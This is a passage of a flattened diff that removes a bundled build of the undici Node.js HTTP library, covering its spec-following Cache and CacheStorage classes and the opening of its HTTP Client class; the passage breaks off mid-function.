yay! - - // 5.5.1 - const responseList = [] - - // 5.5.2 - for (const response of responses) { - // 5.5.2.1 - const responseObject = new Response(response.body?.source ?? null) - const body = responseObject[kState].body - responseObject[kState] = response - responseObject[kState].body = body - responseObject[kHeaders][kHeadersList] = response.headersList - responseObject[kHeaders][kGuard] = 'immutable' - - responseList.push(responseObject) - } - - // 6. 
- return Object.freeze(responseList) - } - - async add (request) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.add' }) - - request = webidl.converters.RequestInfo(request) - - // 1. - const requests = [request] - - // 2. - const responseArrayPromise = this.addAll(requests) - - // 3. - return await responseArrayPromise - } - - async addAll (requests) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.addAll' }) - - requests = webidl.converters['sequence'](requests) - - // 1. - const responsePromises = [] - - // 2. - const requestList = [] - - // 3. - for (const request of requests) { - if (typeof request === 'string') { - continue - } - - // 3.1 - const r = request[kState] - - // 3.2 - if (!urlIsHttpHttpsScheme(r.url) || r.method !== 'GET') { - throw webidl.errors.exception({ - header: 'Cache.addAll', - message: 'Expected http/s scheme when method is not GET.' - }) - } - } - - // 4. - /** @type {ReturnType[]} */ - const fetchControllers = [] - - // 5. - for (const request of requests) { - // 5.1 - const r = new Request(request)[kState] - - // 5.2 - if (!urlIsHttpHttpsScheme(r.url)) { - throw webidl.errors.exception({ - header: 'Cache.addAll', - message: 'Expected http/s scheme.' - }) - } - - // 5.4 - r.initiator = 'fetch' - r.destination = 'subresource' - - // 5.5 - requestList.push(r) - - // 5.6 - const responsePromise = createDeferredPromise() - - // 5.7 - fetchControllers.push(fetching({ - request: r, - dispatcher: getGlobalDispatcher(), - processResponse (response) { - // 1. - if (response.type === 'error' || response.status === 206 || response.status < 200 || response.status > 299) { - responsePromise.reject(webidl.errors.exception({ - header: 'Cache.addAll', - message: 'Received an invalid status code or the request failed.' - })) - } else if (response.headersList.contains('vary')) { // 2. 
- // 2.1 - const fieldValues = getFieldValues(response.headersList.get('vary')) - - // 2.2 - for (const fieldValue of fieldValues) { - // 2.2.1 - if (fieldValue === '*') { - responsePromise.reject(webidl.errors.exception({ - header: 'Cache.addAll', - message: 'invalid vary field value' - })) - - for (const controller of fetchControllers) { - controller.abort() - } - - return - } - } - } - }, - processResponseEndOfBody (response) { - // 1. - if (response.aborted) { - responsePromise.reject(new DOMException('aborted', 'AbortError')) - return - } - - // 2. - responsePromise.resolve(response) - } - })) - - // 5.8 - responsePromises.push(responsePromise.promise) - } - - // 6. - const p = Promise.all(responsePromises) - - // 7. - const responses = await p - - // 7.1 - const operations = [] - - // 7.2 - let index = 0 - - // 7.3 - for (const response of responses) { - // 7.3.1 - /** @type {CacheBatchOperation} */ - const operation = { - type: 'put', // 7.3.2 - request: requestList[index], // 7.3.3 - response // 7.3.4 - } - - operations.push(operation) // 7.3.5 - - index++ // 7.3.6 - } - - // 7.5 - const cacheJobPromise = createDeferredPromise() - - // 7.6.1 - let errorData = null - - // 7.6.2 - try { - this.#batchCacheOperations(operations) - } catch (e) { - errorData = e - } - - // 7.6.3 - queueMicrotask(() => { - // 7.6.3.1 - if (errorData === null) { - cacheJobPromise.resolve(undefined) - } else { - // 7.6.3.2 - cacheJobPromise.reject(errorData) - } - }) - - // 7.7 - return cacheJobPromise.promise - } - - async put (request, response) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 2, { header: 'Cache.put' }) - - request = webidl.converters.RequestInfo(request) - response = webidl.converters.Response(response) - - // 1. - let innerRequest = null - - // 2. - if (request instanceof Request) { - innerRequest = request[kState] - } else { // 3. - innerRequest = new Request(request)[kState] - } - - // 4. 
- if (!urlIsHttpHttpsScheme(innerRequest.url) || innerRequest.method !== 'GET') { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Expected an http/s scheme when method is not GET' - }) - } - - // 5. - const innerResponse = response[kState] - - // 6. - if (innerResponse.status === 206) { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Got 206 status' - }) - } - - // 7. - if (innerResponse.headersList.contains('vary')) { - // 7.1. - const fieldValues = getFieldValues(innerResponse.headersList.get('vary')) - - // 7.2. - for (const fieldValue of fieldValues) { - // 7.2.1 - if (fieldValue === '*') { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Got * vary field value' - }) - } - } - } - - // 8. - if (innerResponse.body && (isDisturbed(innerResponse.body.stream) || innerResponse.body.stream.locked)) { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Response body is locked or disturbed' - }) - } - - // 9. - const clonedResponse = cloneResponse(innerResponse) - - // 10. - const bodyReadPromise = createDeferredPromise() - - // 11. - if (innerResponse.body != null) { - // 11.1 - const stream = innerResponse.body.stream - - // 11.2 - const reader = stream.getReader() - - // 11.3 - readAllBytes(reader).then(bodyReadPromise.resolve, bodyReadPromise.reject) - } else { - bodyReadPromise.resolve(undefined) - } - - // 12. - /** @type {CacheBatchOperation[]} */ - const operations = [] - - // 13. - /** @type {CacheBatchOperation} */ - const operation = { - type: 'put', // 14. - request: innerRequest, // 15. - response: clonedResponse // 16. - } - - // 17. - operations.push(operation) - - // 19. 
- const bytes = await bodyReadPromise.promise - - if (clonedResponse.body != null) { - clonedResponse.body.source = bytes - } - - // 19.1 - const cacheJobPromise = createDeferredPromise() - - // 19.2.1 - let errorData = null - - // 19.2.2 - try { - this.#batchCacheOperations(operations) - } catch (e) { - errorData = e - } - - // 19.2.3 - queueMicrotask(() => { - // 19.2.3.1 - if (errorData === null) { - cacheJobPromise.resolve() - } else { // 19.2.3.2 - cacheJobPromise.reject(errorData) - } - }) - - return cacheJobPromise.promise - } - - async delete (request, options = {}) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.delete' }) - - request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - /** - * @type {Request} - */ - let r = null - - if (request instanceof Request) { - r = request[kState] - - if (r.method !== 'GET' && !options.ignoreMethod) { - return false - } - } else { - assert(typeof request === 'string') - - r = new Request(request)[kState] - } - - /** @type {CacheBatchOperation[]} */ - const operations = [] - - /** @type {CacheBatchOperation} */ - const operation = { - type: 'delete', - request: r, - options - } - - operations.push(operation) - - const cacheJobPromise = createDeferredPromise() - - let errorData = null - let requestResponses - - try { - requestResponses = this.#batchCacheOperations(operations) - } catch (e) { - errorData = e - } - - queueMicrotask(() => { - if (errorData === null) { - cacheJobPromise.resolve(!!requestResponses?.length) - } else { - cacheJobPromise.reject(errorData) - } - }) - - return cacheJobPromise.promise - } - - /** - * @see https://w3c.github.io/ServiceWorker/#dom-cache-keys - * @param {any} request - * @param {import('../../types/cache').CacheQueryOptions} options - * @returns {readonly Request[]} - */ - async keys (request = undefined, options = {}) { - webidl.brandCheck(this, Cache) - - if (request !== undefined) 
request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - // 1. - let r = null - - // 2. - if (request !== undefined) { - // 2.1 - if (request instanceof Request) { - // 2.1.1 - r = request[kState] - - // 2.1.2 - if (r.method !== 'GET' && !options.ignoreMethod) { - return [] - } - } else if (typeof request === 'string') { // 2.2 - r = new Request(request)[kState] - } - } - - // 4. - const promise = createDeferredPromise() - - // 5. - // 5.1 - const requests = [] - - // 5.2 - if (request === undefined) { - // 5.2.1 - for (const requestResponse of this.#relevantRequestResponseList) { - // 5.2.1.1 - requests.push(requestResponse[0]) - } - } else { // 5.3 - // 5.3.1 - const requestResponses = this.#queryCache(r, options) - - // 5.3.2 - for (const requestResponse of requestResponses) { - // 5.3.2.1 - requests.push(requestResponse[0]) - } - } - - // 5.4 - queueMicrotask(() => { - // 5.4.1 - const requestList = [] - - // 5.4.2 - for (const request of requests) { - const requestObject = new Request('https://a') - requestObject[kState] = request - requestObject[kHeaders][kHeadersList] = request.headersList - requestObject[kHeaders][kGuard] = 'immutable' - requestObject[kRealm] = request.client - - // 5.4.2.1 - requestList.push(requestObject) - } - - // 5.4.3 - promise.resolve(Object.freeze(requestList)) - }) - - return promise.promise - } - - /** - * @see https://w3c.github.io/ServiceWorker/#batch-cache-operations-algorithm - * @param {CacheBatchOperation[]} operations - * @returns {requestResponseList} - */ - #batchCacheOperations (operations) { - // 1. - const cache = this.#relevantRequestResponseList - - // 2. - const backupCache = [...cache] - - // 3. 
- const addedItems = [] - - // 4.1 - const resultList = [] - - try { - // 4.2 - for (const operation of operations) { - // 4.2.1 - if (operation.type !== 'delete' && operation.type !== 'put') { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'operation type does not match "delete" or "put"' - }) - } - - // 4.2.2 - if (operation.type === 'delete' && operation.response != null) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'delete operation should not have an associated response' - }) - } - - // 4.2.3 - if (this.#queryCache(operation.request, operation.options, addedItems).length) { - throw new DOMException('???', 'InvalidStateError') - } - - // 4.2.4 - let requestResponses - - // 4.2.5 - if (operation.type === 'delete') { - // 4.2.5.1 - requestResponses = this.#queryCache(operation.request, operation.options) - - // TODO: the spec is wrong, this is needed to pass WPTs - if (requestResponses.length === 0) { - return [] - } - - // 4.2.5.2 - for (const requestResponse of requestResponses) { - const idx = cache.indexOf(requestResponse) - assert(idx !== -1) - - // 4.2.5.2.1 - cache.splice(idx, 1) - } - } else if (operation.type === 'put') { // 4.2.6 - // 4.2.6.1 - if (operation.response == null) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'put operation should have an associated response' - }) - } - - // 4.2.6.2 - const r = operation.request - - // 4.2.6.3 - if (!urlIsHttpHttpsScheme(r.url)) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'expected http or https scheme' - }) - } - - // 4.2.6.4 - if (r.method !== 'GET') { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'not get method' - }) - } - - // 4.2.6.5 - if (operation.options != null) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'options must not be defined' - }) - } - - // 
4.2.6.6 - requestResponses = this.#queryCache(operation.request) - - // 4.2.6.7 - for (const requestResponse of requestResponses) { - const idx = cache.indexOf(requestResponse) - assert(idx !== -1) - - // 4.2.6.7.1 - cache.splice(idx, 1) - } - - // 4.2.6.8 - cache.push([operation.request, operation.response]) - - // 4.2.6.10 - addedItems.push([operation.request, operation.response]) - } - - // 4.2.7 - resultList.push([operation.request, operation.response]) - } - - // 4.3 - return resultList - } catch (e) { // 5. - // 5.1 - this.#relevantRequestResponseList.length = 0 - - // 5.2 - this.#relevantRequestResponseList = backupCache - - // 5.3 - throw e - } - } - - /** - * @see https://w3c.github.io/ServiceWorker/#query-cache - * @param {any} requestQuery - * @param {import('../../types/cache').CacheQueryOptions} options - * @param {requestResponseList} targetStorage - * @returns {requestResponseList} - */ - #queryCache (requestQuery, options, targetStorage) { - /** @type {requestResponseList} */ - const resultList = [] - - const storage = targetStorage ?? 
this.#relevantRequestResponseList - - for (const requestResponse of storage) { - const [cachedRequest, cachedResponse] = requestResponse - if (this.#requestMatchesCachedItem(requestQuery, cachedRequest, cachedResponse, options)) { - resultList.push(requestResponse) - } - } - - return resultList - } - - /** - * @see https://w3c.github.io/ServiceWorker/#request-matches-cached-item-algorithm - * @param {any} requestQuery - * @param {any} request - * @param {any | null} response - * @param {import('../../types/cache').CacheQueryOptions | undefined} options - * @returns {boolean} - */ - #requestMatchesCachedItem (requestQuery, request, response = null, options) { - // if (options?.ignoreMethod === false && request.method === 'GET') { - // return false - // } - - const queryURL = new URL(requestQuery.url) - - const cachedURL = new URL(request.url) - - if (options?.ignoreSearch) { - cachedURL.search = '' - - queryURL.search = '' - } - - if (!urlEquals(queryURL, cachedURL, true)) { - return false - } - - if ( - response == null || - options?.ignoreVary || - !response.headersList.contains('vary') - ) { - return true - } - - const fieldValues = getFieldValues(response.headersList.get('vary')) - - for (const fieldValue of fieldValues) { - if (fieldValue === '*') { - return false - } - - const requestValue = request.headersList.get(fieldValue) - const queryValue = requestQuery.headersList.get(fieldValue) - - // If one has the header and the other doesn't, or one has - // a different value than the other, return false - if (requestValue !== queryValue) { - return false - } - } - - return true - } -} - -Object.defineProperties(Cache.prototype, { - [Symbol.toStringTag]: { - value: 'Cache', - configurable: true - }, - match: kEnumerableProperty, - matchAll: kEnumerableProperty, - add: kEnumerableProperty, - addAll: kEnumerableProperty, - put: kEnumerableProperty, - delete: kEnumerableProperty, - keys: kEnumerableProperty -}) - -const cacheQueryOptionConverters = [ - { - key: 
'ignoreSearch', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'ignoreMethod', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'ignoreVary', - converter: webidl.converters.boolean, - defaultValue: false - } -] - -webidl.converters.CacheQueryOptions = webidl.dictionaryConverter(cacheQueryOptionConverters) - -webidl.converters.MultiCacheQueryOptions = webidl.dictionaryConverter([ - ...cacheQueryOptionConverters, - { - key: 'cacheName', - converter: webidl.converters.DOMString - } -]) - -webidl.converters.Response = webidl.interfaceConverter(Response) - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.RequestInfo -) - -module.exports = { - Cache -} - - -/***/ }), - -/***/ 7907: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kConstruct } = __nccwpck_require__(9174) -const { Cache } = __nccwpck_require__(6101) -const { webidl } = __nccwpck_require__(1744) -const { kEnumerableProperty } = __nccwpck_require__(3983) - -class CacheStorage { - /** - * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-name-to-cache-map - * @type {Map} - */ - async has (cacheName) { - webidl.brandCheck(this, CacheStorage) - webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.has' }) - - cacheName = webidl.converters.DOMString(cacheName) - - // 2.1.1 - // 2.2 - return this.#caches.has(cacheName) - } - - /** - * @see https://w3c.github.io/ServiceWorker/#dom-cachestorage-open - * @param {string} cacheName - * @returns {Promise} - */ - async open (cacheName) { - webidl.brandCheck(this, CacheStorage) - webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.open' }) - - cacheName = webidl.converters.DOMString(cacheName) - - // 2.1 - if (this.#caches.has(cacheName)) { - // await caches.open('v1') !== await caches.open('v1') - - // 2.1.1 - const cache = this.#caches.get(cacheName) - - // 2.1.1.1 - return new Cache(kConstruct, cache) 
- } - - // 2.2 - const cache = [] - - // 2.3 - this.#caches.set(cacheName, cache) - - // 2.4 - return new Cache(kConstruct, cache) - } - - /** - * @see https://w3c.github.io/ServiceWorker/#cache-storage-delete - * @param {string} cacheName - * @returns {Promise} - */ - async delete (cacheName) { - webidl.brandCheck(this, CacheStorage) - webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.delete' }) - - cacheName = webidl.converters.DOMString(cacheName) - - return this.#caches.delete(cacheName) - } - - /** - * @see https://w3c.github.io/ServiceWorker/#cache-storage-keys - * @returns {string[]} - */ - async keys () { - webidl.brandCheck(this, CacheStorage) - - // 2.1 - const keys = this.#caches.keys() - - // 2.2 - return [...keys] - } -} - -Object.defineProperties(CacheStorage.prototype, { - [Symbol.toStringTag]: { - value: 'CacheStorage', - configurable: true - }, - match: kEnumerableProperty, - has: kEnumerableProperty, - open: kEnumerableProperty, - delete: kEnumerableProperty, - keys: kEnumerableProperty -}) - -module.exports = { - CacheStorage -} - - -/***/ }), - -/***/ 9174: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -module.exports = { - kConstruct: (__nccwpck_require__(2785).kConstruct) -} - - -/***/ }), - -/***/ 2396: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const assert = __nccwpck_require__(9491) -const { URLSerializer } = __nccwpck_require__(685) -const { isValidHeaderName } = __nccwpck_require__(2538) - -/** - * @see https://url.spec.whatwg.org/#concept-url-equals - * @param {URL} A - * @param {URL} B - * @param {boolean | undefined} excludeFragment - * @returns {boolean} - */ -function urlEquals (A, B, excludeFragment = false) { - const serializedA = URLSerializer(A, excludeFragment) - - const serializedB = URLSerializer(B, excludeFragment) - - return serializedA === serializedB -} - -/** - * @see 
https://github.com/chromium/chromium/blob/694d20d134cb553d8d89e5500b9148012b1ba299/content/browser/cache_storage/cache_storage_cache.cc#L260-L262 - * @param {string} header - */ -function fieldValues (header) { - assert(header !== null) - - const values = [] - - for (let value of header.split(',')) { - value = value.trim() - - if (!value.length) { - continue - } else if (!isValidHeaderName(value)) { - continue - } - - values.push(value) - } - - return values -} - -module.exports = { - urlEquals, - fieldValues -} - - -/***/ }), - -/***/ 3598: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// @ts-check - - - -/* global WebAssembly */ - -const assert = __nccwpck_require__(9491) -const net = __nccwpck_require__(1808) -const http = __nccwpck_require__(3685) -const { pipeline } = __nccwpck_require__(2781) -const util = __nccwpck_require__(3983) -const timers = __nccwpck_require__(9459) -const Request = __nccwpck_require__(2905) -const DispatcherBase = __nccwpck_require__(4839) -const { - RequestContentLengthMismatchError, - ResponseContentLengthMismatchError, - InvalidArgumentError, - RequestAbortedError, - HeadersTimeoutError, - HeadersOverflowError, - SocketError, - InformationalError, - BodyTimeoutError, - HTTPParserError, - ResponseExceededMaxSizeError, - ClientDestroyedError -} = __nccwpck_require__(8045) -const buildConnector = __nccwpck_require__(2067) -const { - kUrl, - kReset, - kServerName, - kClient, - kBusy, - kParser, - kConnect, - kBlocking, - kResuming, - kRunning, - kPending, - kSize, - kWriting, - kQueue, - kConnected, - kConnecting, - kNeedDrain, - kNoRef, - kKeepAliveDefaultTimeout, - kHostHeader, - kPendingIdx, - kRunningIdx, - kError, - kPipelining, - kSocket, - kKeepAliveTimeoutValue, - kMaxHeadersSize, - kKeepAliveMaxTimeout, - kKeepAliveTimeoutThreshold, - kHeadersTimeout, - kBodyTimeout, - kStrictContentLength, - kConnector, - kMaxRedirections, - kMaxRequests, - kCounter, - kClose, - kDestroy, - kDispatch, 
- kInterceptors, - kLocalAddress, - kMaxResponseSize, - kHTTPConnVersion, - // HTTP2 - kHost, - kHTTP2Session, - kHTTP2SessionState, - kHTTP2BuildRequest, - kHTTP2CopyHeaders, - kHTTP1BuildRequest -} = __nccwpck_require__(2785) - -/** @type {import('http2')} */ -let http2 -try { - http2 = __nccwpck_require__(5158) -} catch { - // @ts-ignore - http2 = { constants: {} } -} - -const { - constants: { - HTTP2_HEADER_AUTHORITY, - HTTP2_HEADER_METHOD, - HTTP2_HEADER_PATH, - HTTP2_HEADER_SCHEME, - HTTP2_HEADER_CONTENT_LENGTH, - HTTP2_HEADER_EXPECT, - HTTP2_HEADER_STATUS - } -} = http2 - -// Experimental -let h2ExperimentalWarned = false - -const FastBuffer = Buffer[Symbol.species] - -const kClosedResolve = Symbol('kClosedResolve') - -const channels = {} - -try { - const diagnosticsChannel = __nccwpck_require__(7643) - channels.sendHeaders = diagnosticsChannel.channel('undici:client:sendHeaders') - channels.beforeConnect = diagnosticsChannel.channel('undici:client:beforeConnect') - channels.connectError = diagnosticsChannel.channel('undici:client:connectError') - channels.connected = diagnosticsChannel.channel('undici:client:connected') -} catch { - channels.sendHeaders = { hasSubscribers: false } - channels.beforeConnect = { hasSubscribers: false } - channels.connectError = { hasSubscribers: false } - channels.connected = { hasSubscribers: false } -} - -/** - * @type {import('../types/client').default} - */ -class Client extends DispatcherBase { - /** - * - * @param {string|URL} url - * @param {import('../types/client').Client.Options} options - */ - constructor (url, { - interceptors, - maxHeaderSize, - headersTimeout, - socketTimeout, - requestTimeout, - connectTimeout, - bodyTimeout, - idleTimeout, - keepAlive, - keepAliveTimeout, - maxKeepAliveTimeout, - keepAliveMaxTimeout, - keepAliveTimeoutThreshold, - socketPath, - pipelining, - tls, - strictContentLength, - maxCachedSessions, - maxRedirections, - connect, - maxRequestsPerClient, - localAddress, - maxResponseSize, 
- autoSelectFamily, - autoSelectFamilyAttemptTimeout, - // h2 - allowH2, - maxConcurrentStreams - } = {}) { - super() - - if (keepAlive !== undefined) { - throw new InvalidArgumentError('unsupported keepAlive, use pipelining=0 instead') - } - - if (socketTimeout !== undefined) { - throw new InvalidArgumentError('unsupported socketTimeout, use headersTimeout & bodyTimeout instead') - } - - if (requestTimeout !== undefined) { - throw new InvalidArgumentError('unsupported requestTimeout, use headersTimeout & bodyTimeout instead') - } - - if (idleTimeout !== undefined) { - throw new InvalidArgumentError('unsupported idleTimeout, use keepAliveTimeout instead') - } - - if (maxKeepAliveTimeout !== undefined) { - throw new InvalidArgumentError('unsupported maxKeepAliveTimeout, use keepAliveMaxTimeout instead') - } - - if (maxHeaderSize != null && !Number.isFinite(maxHeaderSize)) { - throw new InvalidArgumentError('invalid maxHeaderSize') - } - - if (socketPath != null && typeof socketPath !== 'string') { - throw new InvalidArgumentError('invalid socketPath') - } - - if (connectTimeout != null && (!Number.isFinite(connectTimeout) || connectTimeout < 0)) { - throw new InvalidArgumentError('invalid connectTimeout') - } - - if (keepAliveTimeout != null && (!Number.isFinite(keepAliveTimeout) || keepAliveTimeout <= 0)) { - throw new InvalidArgumentError('invalid keepAliveTimeout') - } - - if (keepAliveMaxTimeout != null && (!Number.isFinite(keepAliveMaxTimeout) || keepAliveMaxTimeout <= 0)) { - throw new InvalidArgumentError('invalid keepAliveMaxTimeout') - } - - if (keepAliveTimeoutThreshold != null && !Number.isFinite(keepAliveTimeoutThreshold)) { - throw new InvalidArgumentError('invalid keepAliveTimeoutThreshold') - } - - if (headersTimeout != null && (!Number.isInteger(headersTimeout) || headersTimeout < 0)) { - throw new InvalidArgumentError('headersTimeout must be a positive integer or zero') - } - - if (bodyTimeout != null && (!Number.isInteger(bodyTimeout) || 
bodyTimeout < 0)) { - throw new InvalidArgumentError('bodyTimeout must be a positive integer or zero') - } - - if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { - throw new InvalidArgumentError('connect must be a function or an object') - } - - if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { - throw new InvalidArgumentError('maxRedirections must be a positive number') - } - - if (maxRequestsPerClient != null && (!Number.isInteger(maxRequestsPerClient) || maxRequestsPerClient < 0)) { - throw new InvalidArgumentError('maxRequestsPerClient must be a positive number') - } - - if (localAddress != null && (typeof localAddress !== 'string' || net.isIP(localAddress) === 0)) { - throw new InvalidArgumentError('localAddress must be valid string IP address') - } - - if (maxResponseSize != null && (!Number.isInteger(maxResponseSize) || maxResponseSize < -1)) { - throw new InvalidArgumentError('maxResponseSize must be a positive number') - } - - if ( - autoSelectFamilyAttemptTimeout != null && - (!Number.isInteger(autoSelectFamilyAttemptTimeout) || autoSelectFamilyAttemptTimeout < -1) - ) { - throw new InvalidArgumentError('autoSelectFamilyAttemptTimeout must be a positive number') - } - - // h2 - if (allowH2 != null && typeof allowH2 !== 'boolean') { - throw new InvalidArgumentError('allowH2 must be a valid boolean value') - } - - if (maxConcurrentStreams != null && (typeof maxConcurrentStreams !== 'number' || maxConcurrentStreams < 1)) { - throw new InvalidArgumentError('maxConcurrentStreams must be a possitive integer, greater than 0') - } - - if (typeof connect !== 'function') { - connect = buildConnector({ - ...tls, - maxCachedSessions, - allowH2, - socketPath, - timeout: connectTimeout, - ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? 
{ autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), - ...connect - }) - } - - this[kInterceptors] = interceptors && interceptors.Client && Array.isArray(interceptors.Client) - ? interceptors.Client - : [createRedirectInterceptor({ maxRedirections })] - this[kUrl] = util.parseOrigin(url) - this[kConnector] = connect - this[kSocket] = null - this[kPipelining] = pipelining != null ? pipelining : 1 - this[kMaxHeadersSize] = maxHeaderSize || http.maxHeaderSize - this[kKeepAliveDefaultTimeout] = keepAliveTimeout == null ? 4e3 : keepAliveTimeout - this[kKeepAliveMaxTimeout] = keepAliveMaxTimeout == null ? 600e3 : keepAliveMaxTimeout - this[kKeepAliveTimeoutThreshold] = keepAliveTimeoutThreshold == null ? 1e3 : keepAliveTimeoutThreshold - this[kKeepAliveTimeoutValue] = this[kKeepAliveDefaultTimeout] - this[kServerName] = null - this[kLocalAddress] = localAddress != null ? localAddress : null - this[kResuming] = 0 // 0, idle, 1, scheduled, 2 resuming - this[kNeedDrain] = 0 // 0, idle, 1, scheduled, 2 resuming - this[kHostHeader] = `host: ${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}\r\n` - this[kBodyTimeout] = bodyTimeout != null ? bodyTimeout : 300e3 - this[kHeadersTimeout] = headersTimeout != null ? headersTimeout : 300e3 - this[kStrictContentLength] = strictContentLength == null ? true : strictContentLength - this[kMaxRedirections] = maxRedirections - this[kMaxRequests] = maxRequestsPerClient - this[kClosedResolve] = null - this[kMaxResponseSize] = maxResponseSize > -1 ? maxResponseSize : -1 - this[kHTTPConnVersion] = 'h1' - - // HTTP/2 - this[kHTTP2Session] = null - this[kHTTP2SessionState] = !allowH2 - ? null - : { - // streams: null, // Fixed queue of streams - For future support of `push` - openStreams: 0, // Keep track of them to decide wether or not unref the session - maxConcurrentStreams: maxConcurrentStreams != null ? 
maxConcurrentStreams : 100 // Max peerConcurrentStreams for a Node h2 server - } - this[kHost] = `${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}` - - // kQueue is built up of 3 sections separated by - // the kRunningIdx and kPendingIdx indices. - // | complete | running | pending | - // ^ kRunningIdx ^ kPendingIdx ^ kQueue.length - // kRunningIdx points to the first running element. - // kPendingIdx points to the first pending element. - // This implements a fast queue with an amortized - // time of O(1). - - this[kQueue] = [] - this[kRunningIdx] = 0 - this[kPendingIdx] = 0 - } - - get pipelining () { - return this[kPipelining] - } - - set pipelining (value) { - this[kPipelining] = value - resume(this, true) - } - - get [kPending] () { - return this[kQueue].length - this[kPendingIdx] - } - - get [kRunning] () { - return this[kPendingIdx] - this[kRunningIdx] - } - - get [kSize] () { - return this[kQueue].length - this[kRunningIdx] - } - - get [kConnected] () { - return !!this[kSocket] && !this[kConnecting] && !this[kSocket].destroyed - } - - get [kBusy] () { - const socket = this[kSocket] - return ( - (socket && (socket[kReset] || socket[kWriting] || socket[kBlocking])) || - (this[kSize] >= (this[kPipelining] || 1)) || - this[kPending] > 0 - ) - } - - /* istanbul ignore: only used for test */ - [kConnect] (cb) { - connect(this) - this.once('connect', cb) - } - - [kDispatch] (opts, handler) { - const origin = opts.origin || this[kUrl].origin - - const request = this[kHTTPConnVersion] === 'h2' - ? Request[kHTTP2BuildRequest](origin, opts, handler) - : Request[kHTTP1BuildRequest](origin, opts, handler) - - this[kQueue].push(request) - if (this[kResuming]) { - // Do nothing. - } else if (util.bodyLength(request.body) == null && util.isIterable(request.body)) { - // Wait a tick in case stream/iterator is ended in the same tick. 
- this[kResuming] = 1 - process.nextTick(resume, this) - } else { - resume(this, true) - } - - if (this[kResuming] && this[kNeedDrain] !== 2 && this[kBusy]) { - this[kNeedDrain] = 2 - } - - return this[kNeedDrain] < 2 - } - - async [kClose] () { - // TODO: for H2 we need to gracefully flush the remaining enqueued - // request and close each stream. - return new Promise((resolve) => { - if (!this[kSize]) { - resolve(null) - } else { - this[kClosedResolve] = resolve - } - }) - } - - async [kDestroy] (err) { - return new Promise((resolve) => { - const requests = this[kQueue].splice(this[kPendingIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(this, request, err) - } - - const callback = () => { - if (this[kClosedResolve]) { - // TODO (fix): Should we error here with ClientDestroyedError? - this[kClosedResolve]() - this[kClosedResolve] = null - } - resolve() - } - - if (this[kHTTP2Session] != null) { - util.destroy(this[kHTTP2Session], err) - this[kHTTP2Session] = null - this[kHTTP2SessionState] = null - } - - if (!this[kSocket]) { - queueMicrotask(callback) - } else { - util.destroy(this[kSocket].on('close', callback), err) - } - - resume(this) - }) - } -} - -function onHttp2SessionError (err) { - assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') - - this[kSocket][kError] = err - - onError(this[kClient], err) -} - -function onHttp2FrameError (type, code, id) { - const err = new InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) - - if (id === 0) { - this[kSocket][kError] = err - onError(this[kClient], err) - } -} - -function onHttp2SessionEnd () { - util.destroy(this, new SocketError('other side closed')) - util.destroy(this[kSocket], new SocketError('other side closed')) -} - -function onHTTP2GoAway (code) { - const client = this[kClient] - const err = new InformationalError(`HTTP/2: "GOAWAY" frame received with code ${code}`) - client[kSocket] = null - client[kHTTP2Session] = null - - if 
(client.destroyed) { - assert(this[kPending] === 0) - - // Fail entire queue. - const requests = client[kQueue].splice(client[kRunningIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(this, request, err) - } - } else if (client[kRunning] > 0) { - // Fail head of pipeline. - const request = client[kQueue][client[kRunningIdx]] - client[kQueue][client[kRunningIdx]++] = null - - errorRequest(client, request, err) - } - - client[kPendingIdx] = client[kRunningIdx] - - assert(client[kRunning] === 0) - - client.emit('disconnect', - client[kUrl], - [client], - err - ) - - resume(client) -} - -const constants = __nccwpck_require__(953) -const createRedirectInterceptor = __nccwpck_require__(8861) -const EMPTY_BUF = Buffer.alloc(0) - -async function lazyllhttp () { - const llhttpWasmData = process.env.JEST_WORKER_ID ? __nccwpck_require__(1145) : undefined - - let mod - try { - mod = await WebAssembly.compile(Buffer.from(__nccwpck_require__(5627), 'base64')) - } catch (e) { - /* istanbul ignore next */ - - // We could check if the error was caused by the simd option not - // being enabled, but the occurring of this other error - // * https://github.com/emscripten-core/emscripten/issues/11495 - // got me to remove that check to avoid breaking Node 12. 
